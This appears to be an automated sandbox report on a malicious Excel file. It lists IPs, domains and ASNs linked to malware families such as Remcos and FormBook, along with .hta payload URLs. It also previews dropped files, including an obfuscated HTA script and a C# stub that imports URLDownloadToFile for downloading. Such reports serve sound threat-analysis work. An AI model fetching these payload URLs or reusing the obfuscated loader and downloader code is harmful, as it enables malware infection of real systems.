URL: Screenshot id: 6 Model: Joe Sandbox AI	{ "brands": "unknown" }
	{ "brands": "unknown" }
URL: Screenshot id: 3 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }
URL: Screenshot id: 4 Model: Joe Sandbox AI	{ "brands": [ "Microsoft" ] }
	{ "brands": [ "Microsoft" ] }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.163.184	4lXTg8P7Ih.elf	Get hash	malicious	Mirai	Browse	/tmUnblock.cgi
107.172.44.175	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175/90/jcc/creamypisagreatattitudewithgreatthingsentiretimegivenmr.hta
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175/90/jcc/creamypisagreatattitudewithgreatthingsentiretimegivenmr.hta
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175/90/jcc/creamypisagreatattitudewithgreatthingsentiretimegivenmr.hta
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175/90/jcc/creamypisagreatattitudewithgreatthingsentiretimegivenmr.hta
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175/90/jcc/creamypisagreatattitudewithgreatthingsentiretimegivenmr.hta
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175/90/jcc/creamypisagreatattitudewithgreatthingsentiretimegivenmr.hta
	Document.xla.xlsx	Get hash	malicious	FormBook, HTMLPhisher	Browse	107.172.44.175/244/RFGDF.txt
	bestimylover.hta	Get hash	malicious	Cobalt Strike, FormBook, HTMLPhisher	Browse	107.172.44.175/244/RFGDF.txt
	Shipping Document.xla.xlsx	Get hash	malicious	HTMLPhisher	Browse	107.172.44.175/1321/CAMRM.txt
	Shipping Document.xls	Get hash	malicious	HTMLPhisher	Browse	107.172.44.175/1311/we/seethebestthingsgoodforentireattitudewhoputonmyheartsheismysweetbebay.hta
104.21.34.183	Quotation.xls	Get hash	malicious	Unknown	Browse	bom.so/4yoxhH

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
jktc.pro	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	104.21.34.183
	510005940.docx.doc	Get hash	malicious	Unknown	Browse	104.21.34.183
	510005940.docx.doc	Get hash	malicious	Unknown	Browse	172.67.163.184
paste.ee	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	188.114.96.6
	print preview.js	Get hash	malicious	FormBook	Browse	172.67.187.200
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	104.21.84.67
	invoice09850.xls	Get hash	malicious	Remcos	Browse	188.114.97.6
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	PO-8776-2024.js	Get hash	malicious	Remcos	Browse	104.21.84.67
	NESTLE_MEXICO_Purchase_Order_10122024.xls	Get hash	malicious	Unknown	Browse	188.114.97.6
	matchingwithbestthingstobegreatforentirelifegivenmebestthignsevergive.hta	Get hash	malicious	Cobalt Strike, Remcos, HTMLPhisher	Browse	104.21.84.67
	Orden_de_Compra_Nmero_6782929219.xls	Get hash	malicious	HTMLPhisher	Browse	188.114.96.6

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	104.21.34.183
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	162.159.129.233
	ltT8eZaqtZ.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	172.67.216.167
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.206.64
	0TGy7VIqx7CSab5o.lNK.lnk	Get hash	malicious	Unknown	Browse	172.67.185.252
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	http://ebaumsworld.com	Get hash	malicious	Unknown	Browse	104.17.159.113
	https://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.20.58
	http://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.21.58
AS-COLOCROSSINGUS	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	23.95.235.29
	SwiftCopy_PaymtRecpt121224.exe	Get hash	malicious	Remcos	Browse	192.210.150.17
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	Document.xla	Get hash	malicious	Unknown	Browse	107.172.44.175
	nicegirlforyou.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	172.245.142.60
	nicewithgreatfeaturesreturnformebestthingsgivensoofar.hta	Get hash	malicious	Cobalt Strike, Remcos	Browse	192.3.101.149
	invoice09850.xls	Get hash	malicious	Remcos	Browse	192.3.101.149
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	107.172.44.175
CLOUDFLARENETUS	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	104.21.34.183
	WO-663071 Sabiya Power Station Project.vbs	Get hash	malicious	Remcos	Browse	162.159.129.233
	ltT8eZaqtZ.exe	Get hash	malicious	LummaC Stealer, PureLog Stealer	Browse	172.67.216.167
	htZgRRla8S.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.206.64
	0TGy7VIqx7CSab5o.lNK.lnk	Get hash	malicious	Unknown	Browse	172.67.185.252
	https://es-proposal.webflow.io/	Get hash	malicious	HTMLPhisher	Browse	104.21.112.1
	http://ebaumsworld.com	Get hash	malicious	Unknown	Browse	104.17.159.113
	https://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.20.58
	http://mavenclinic.quatrix.it	Get hash	malicious	Unknown	Browse	104.18.21.58

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
7dcce5b76c8b17472d024758970a406b	Euro confirmation Sp.xls	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	510005940.docx.doc	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Document.xla	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	xeroxscan.Docx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	xeroxscan.Docx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	invoice09850.xls	Get hash	malicious	Remcos	Browse	104.21.34.183 172.67.163.184
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	Invoice A037.xls	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184
	tqkdMdv2zO.doc	Get hash	malicious	XenoRAT	Browse	104.21.34.183 172.67.163.184
	Document.xla.xlsx	Get hash	malicious	Unknown	Browse	104.21.34.183 172.67.163.184

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	15189
Entropy (8bit):	5.0343247648743
Encrypted:	false
SSDEEP:	384:nWraVoGIpN6KQkj2Lkjh4iUxTnaVjvCnS/OdBmRWDf:nW+V3IpNBQkj2Oh4iUxDaVjvCnS/OdBD
MD5:	7BC3FB6565E144A52C5F44408D5D80DF
SHA1:	C3C443BF9F29EAA84B0A580FD5469F4C5CC57F77
SHA-256:	EF6A75C051D70322EDCD5A89E6398CC00E3D860E87A0C7981310D30837CBA495
SHA-512:	D0A936BAF2277884518EDF4729F88DA74C7BAA5BBB58C1060CE66DE92A23694EA993CA69D8820816C5D28182E9A38EE59DE821EE3A73F0D85DBBC74D406285A5
Malicious:	false
Preview:	PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........V.7...?...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ISE\ISE.psd1........Import-IseSnippet........Get-IseSnippet........New-IseSnippet.........._.7...[...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PSWorkflowUtility\

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng[1].hta

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines (65450), with CRLF line terminators
Category:	modified
Size (bytes):	82552
Entropy (8bit):	2.6312177924234574
Encrypted:	false
SSDEEP:	768:tmbUZA+cT/RVeU2Dx6AyZ6LAuAHAbzKxhT65Xd7589mdwaz4a/5XKdf5Pw9KNN/q:tH
MD5:	DB521BEB834B08845D50B334054C4E2D
SHA1:	6A9588668D1DC29631B57D022B2194F884854A75
SHA-256:	E32B43FE4921503121A4A547362EB8A67A50F6D2DEE0C18B409C8655AF008645
SHA-512:	E4C6DF8F6BB47788734DAB93CF2C9575DB206DB35DA61672BE1D75C5E3F3E304941A9CC087C239EB1F0DDEB36FA856EB30B3D150A4612CC03D5ECDF92CCAAF6D
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Obshtml, Description: Yara detected obfuscated html page, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\goodthhingswithgreatcapitalthingsforgreatnewswithgoodmorng[1].hta, Author: Joe Security
Preview:	<Script Language='Javascript'>.. HTML Encryption provided by tufat.com -->.. ..document.write(unescape('%3C%53%63%72%69%70%74%20%4C%61%6E%67%75%61%67%65%3D%27%4A%61%76%61%73%63%72%69%70%74%27%3E%0A%3C%21%2D%2D%20%48%54%4D%4C%20%45%6E%63%72%79%70%74%69%6F%6E%20%70%72%6F%76%69%64%65%64%20%62%79%20%74%75%66%61%74%2E%63%6F%6D%20%2D%2D%3E%0A%3C%21%2D%2D%0A%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%75%6E%65%73%63%61%70%65%28%27%25%33%43%25%32%31%25%34%34%25%34%46%25%34%33%25%35%34%25%35%39%25%35%30%25%34%35%25%32%30%25%36%38%25%37%34%25%36%44%25%36%43%25%33%45%25%30%41%25%33%43%25%36%44%25%36%35%25%37%34%25%36%31%25%32%30%25%36%38%25%37%34%25%37%34%25%37%30%25%32%44%25%36%35%25%37%31%25%37%35%25%36%39%25%37%36%25%33%44%25%32%32%25%35%38%25%32%44%25%35%35%25%34%31%25%32%44%25%34%33%25%36%46%25%36%44%25%37%30%25%36%31%25%37%34%25%36%39%25%36%32%25%36%43%25%36%35%25%32%32%25%32%30%25%36%33%25%36%46%25%36%45%25%37%34%25%36%35%25%36%45%25%37%34%25%33%44%25%32%32%25%34%39%25%34%35%25%33%

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\simplecookiebiscutwithsweetnessforentiretime[1].tiff

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Unicode text, UTF-16, little-endian text, with very long lines (3397), with CRLF line terminators
Category:	dropped
Size (bytes):	154312
Entropy (8bit):	3.806639108429499
Encrypted:	false
SSDEEP:	3072:puPqJg1SUqFVMcZjuPqJg1SUqFVMcRuPqJg1SUqFVMcP:pEq8SbOcZjEq8SbOcREq8SbOcP
MD5:	DB9CA30AC0C6D2526A780AB2E0AD8046
SHA1:	895B9150FB6B527C28155C466E10B553521C209B
SHA-256:	2BFEB2D07560A76ACC7181E72B31B8F758BE6300B81E9AAB7EB3157AE7E89730
SHA-512:	9994EA28C119620A70169B18CDA3D7F93083A352EE55A2BC72FB14EA125A67B5D2A93200A7D488D8B1712F39B3CE62B972471E2508269B9158A78E85E8B6374D
Malicious:	false
Preview:	...... . . . .....L.L.K.q.z.i.i.f.i.U.G.W.i.s.K. .=. .".g.c.u.N.p.a.p.p.i.q.f.z.l.x.n.".....P.h.U.m.f.h.N.j.S.h.p.v.W.k.m. .=. .".a.K.f.K.f.h.i.Z.O.t.n.p.p.a.Z.".....G.L.u.K.S.G.i.x.c.c.W.K.U.Q.W. .=. .".W.c.h.P.z.e.K.s.P.L.i.Z.K.h.N.".........W.L.T.C.W.d.U.p.U.G.N.K.W.h.u. .=. .".U.e.W.L.z.R.j.u.K.L.a.n.A.u.i.".....W.x.G.n.e.W.Z.R.U.A.W.k.K.f.W. .=. .".L.t.p.N.L.Z.k.C.h.N.d.i.q.W.i.".....k.L.m.c.W.J.K.G.J.c.L.k.P.b.v. .=. .".z.A.f.W.e.N.o.K.I.d.W.k.f.R.K.".....A.L.e.c.P.e.P.u.c.e.s.e.W.a.N. .=. .".d.Z.j.A.s.u.f.K.N.o.s.K.i.o.i.".....G.e.i.l.z.c.B.N.q.r.z.S.e.q.d. .=. .".i.o.K.W.r.L.P.v.m.q.o.L.j.H.z.".....n.h.d.W.S.G.c.z.P.W.W.l.i.c.W. .=. .".g.k.L.a.u.K.W.m.W.f.k.g.v.u.L.".....A.x.G.e.A.j.e.W.f.P.K.b.A.m.p. .=. .".W.n.G.W.W.K.K.o.K.K.x.K.i.I.z.".....b.L.L.h.i.K.k.g.o.K.b.b.o.I.b. .=. .".j.G.W.e.I.K.N.n.p.J.m.K.h.U.L.".....A.G.P.S.U.i.f.W.m.L.o.o.L.K.n. .=. .".G.k.L.Z.A.z.U.G.x.e.U.U.v.L.N.".....N.m.G.g.p.i.K.h.W.N.B.A.Z.h.c. .=. .".q.C.q.G.o.o.c.O.n.e.L.L.p.h.W.".....l.K.S.L.W.f.L.W.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1096C50E.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	1293620
Entropy (8bit):	4.563127917199792
Encrypted:	false
SSDEEP:	6144:HepUelSAzNeNpVAZSedri2/Op4mD3f5ReZdZJElOFmkDrvwA2w4Meh/q4MmuRDrM:HepRlSPiS4ri2/lmzCJEuL1eU1muq
MD5:	F71C973B5E362DFD6408D6C009E5643E
SHA1:	24B3CE67B31BFD4791287932206D54C73489424E
SHA-256:	27D0986B7EC233689490135118670F01325F21DFD6F60492AF5D62C7CF1E3045
SHA-512:	4C3F506BC4313437C9194EED3CD5AB6616490AE376FC61DD38D8E00F975C41A23FC8D322E41CFBEC380F04F49ADF6E77A3B22BB5C96EBE714F5713B09838F1F4
Malicious:	false
Preview:	....l...........%...............@m..?... EMF....4....!..1...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3..."...........!...................................................3...'.......................%...........................................................L...d...v.../......._...v.../.......1...!..............?...........?................................L...d...................................!..............?...........?............................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\151FBAF3.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	109544
Entropy (8bit):	4.282675970330063
Encrypted:	false
SSDEEP:	768:I4KlWqWxZiDQ4hHdCUeHxCDJB9Cnh3KCg0F9BV:I42WxF4MyeKCV
MD5:	F7B9A8F20E64B2CB6B572BCBA5866236
SHA1:	2F092A0A518639332BE76BF60DBB966AC331D356
SHA-256:	72447B22A4BBC05B9E9183DF2ADB712AB51C3A45C6247C2303024197D1623F57
SHA-512:	4A78624A9EB02208F3F30D03CC53EBE00BDD2C59E8F7719E35E706D51CD2F8D0D330BE6D6FAD2A9652536F888CB99E0CBE1E3B97A05EA65CB5914C37C501B728
Malicious:	false
Preview:	....l...............r............C...a.. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s..."...........!...................................................s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\288995B7.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	13284
Entropy (8bit):	2.721890413361754
Encrypted:	false
SSDEEP:	96:9pyRiCCyydtY5YkBJYstgWqjmLRQS1lkQJ8/tIdSUsQ5lV:9joObWPb1pGpQR
MD5:	64389AE456210E7353BD9F7D9C8EBB26
SHA1:	2E2A820EEC50A0CAF659C8A1747A2C161A81A067
SHA-256:	26F6FE29563F2DE0D66D9EB2F963F00CBA0211E9F1DA8BBCDC9426E76B328ACE
SHA-512:	FF679773F635DBD0FC940B880D04D77FB18786EA566CA83A348CBA36FA82EAFFD1AA76D9D4871C66580AED5FD65A8187C29C3A0BBAD8E38D0C83CA2C7886D5D7
Malicious:	false
Preview:	....l...........#...V...........Z&...... EMF.....3..K.......................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W..."...........!...............................................$...W...R...p.................................. C.a.l.i.b.r.i........................................................................................'/....h./...'/........................h./.............../.N.'/.............m'/../.............../......./......./...'/........../.../..'/

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D96E0C3A.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	44256
Entropy (8bit):	3.147465798679962
Encrypted:	false
SSDEEP:	384:j1W5NF0vUXfOjwTsiyGGiugBhUErpxTORe4tyJ2c:ZWYW+GGidBhUErpxTORe4ty5
MD5:	36D8FF25D14E7E2FBB1968E952FF9C17
SHA1:	E3BD7140DA6CAD87C5A1D5417DFBDD7B0E67B110
SHA-256:	305DCBFBEB9FFEE587E061D779CA1DDF31939ECD64EEE7D8A22BA9D640B48633
SHA-512:	B4B753222F617F78B36949BD9F37E13D68D9FD7367484BEE799F0D7AE38E1705E997A6409251BC2B9830012536FBD08C3C6CB7411D9122F939833F38E303DCBF
Malicious:	false
Preview:	....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E9221B01.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	8084
Entropy (8bit):	2.5551694039574895
Encrypted:	false
SSDEEP:	96:j+RiOO++Z39FAcRwxBdEtzBfCC7Boff8oBJ6ANQ4HJV:jtGNOzBArH
MD5:	721E8AAC81F0A6D4659831CB8194D668
SHA1:	6BE0CEFAEC9F0B1EAD9DE03C8D4679767CF8B549
SHA-256:	E52DF310BB20C42F738A3C8E03ED4110CB795B8A07AE5D4E474EA075564B1622
SHA-512:	24CACEED3153493E34988C35628FAA2C198C9B13AFDD8ABC214EFBA0ACCD0579BADCD5EB0F76F5BDA16D3A279DB4DF4BB218ABD5FFD751C6E62676BD1AAEF2E7
Malicious:	false
Preview:	....l.........../...n............9...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o..."...........!...............................................0...o...'.......................%...........................................................L...d...........>...............q.......!..............?...........?................................R...p...................................A.r.i.a.l...............................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F8D45058.emf

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	44256
Entropy (8bit):	3.15066292565687
Encrypted:	false
SSDEEP:	384:IhpMW5NFNimpUIuOjwTsiyGGiugBhUErpxTORe4tyIWY5:BWzi+8+GGidBhUErpxTORe4tyI9
MD5:	F1EC2E98B0F577B675156B13DCF94105
SHA1:	4FF2D02051E92771FBB245BA8095C80148A0F61A
SHA-256:	66AFB9C12E20A08F9A713C366EDE8A9CD8F4A93B7D7BFC76205013C28A3250E9
SHA-512:	6E442DB49BF2A429AD2CA7CB3804D79791C1E1FEB414F69FDDD58042E98C5AA5BFC1C751713DB76DD58DC9F3CAC3A7C491228797A909F8FD0291048E8F2FC9BE
Malicious:	false
Preview:	....l................................ .. EMF...............................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'.......................%...........................................................L...d...........................m...-...!..............?...........?................................R...p.................................. A.r.i.a.l...............................................

C:\Users\user\AppData\Local\Temp\RES5706.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Dec 12 20:43:28 2024, 1st section name ".debug$S"
Category:	dropped
Size (bytes):	1328
Entropy (8bit):	3.9852356875970405
Encrypted:	false
SSDEEP:	24:HIe9EurN7AlXZdH7wKdNWI+ycuZhNjakS1PNnqSqd:VrNIvMKd41ulja3vqSK
MD5:	06074197589EBD74C4E17AED685F79AD
SHA1:	9CB7B4043C28134D507EC349C27F435611B47082
SHA-256:	1A89EE2499F6CDD708814F31DC9E084063F5AF9EE767B8E5E582C88321FE9BF4
SHA-512:	1EF29A6C42E110E6C49B6E72C45953F5CAD6D92AB6E378A84B49754855614350AEA69B3783C4A23DAAF70BD69F48D5DFB3D4D979DCFB47CF3B139B96680D2B79
Malicious:	false
Preview:	L....J[g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........S....c:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP................W./R.....=..-%..........4.......C:\Users\user\AppData\Local\Temp\RES5706.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.i.o.e.5.3.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

C:\Users\user\AppData\Local\Temp\c0vottoj.rsp.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\ho03fsic.s2y.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\l2ioe53r\CSC777882445C184F59ADDE974B4279F6D.TMP

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0871452500518513
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryhak7Ynqq1PN5Dlq5J:+RI+ycuZhNjakS1PNnqX
MD5:	57B22F52AA1805109D3DE2B595042D25
SHA1:	60A02CB0044CDC44ECCDDEB4C8B7BF036D9AC7D3
SHA-256:	91ECBF16BF24372AB1E46BD949774F17835799C040B980B60A9090892932829B
SHA-512:	38BE983C2BFA1E3D9E9590359082DAA07D1610ECF0DF717E365F8B36829023B6808D38E81661855B8E8E918C5838B481F50E845369927FC50B3924ABEEDFD2D4
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...l.2.i.o.e.5.3.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...l.2.i.o.e.5.3.r...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.0.cs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (380)
Category:	dropped
Size (bytes):	493
Entropy (8bit):	3.893627474667166
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuwvev8y7FMOfpjQXReKJ8SRHy4HaDSxrVRbFrEVbFy:V/DTLDfuVv17DuXfHtfRZEhFy
MD5:	2DC1DA68A8611E4D35E8B2659F1DEB5C
SHA1:	BD58E2D1AA111060D16C836072BA9B6E34FE61D1
SHA-256:	AA1FA62E1BF317E1570C02F949F24D4D9CD10B367643CA7021FE2B7EA0CA6B2C
SHA-512:	D3D074E37429B771C10265F6B520CF55329AAB25D8A617388F966015BD1D51473B5B859A0B7A9824C3D5D305199457EAB5E15D247C1837B6CD7464E836A9CC48
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace Az.{. public class ERiILfN. {. [DllImport("URlMON.dLL", CharSet = CharSet.Unicode)]public static extern IntPtr URLDownloadToFile(IntPtr XToPAokQl,string mDPjKpA,string XgBhMVZ,uint dSEJAYkpG,IntPtr yyuZCALYY);.. }..}.

C:\Users\user\AppData\Local\Temp\l2ioe53r\l2ioe53r.cmdline

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
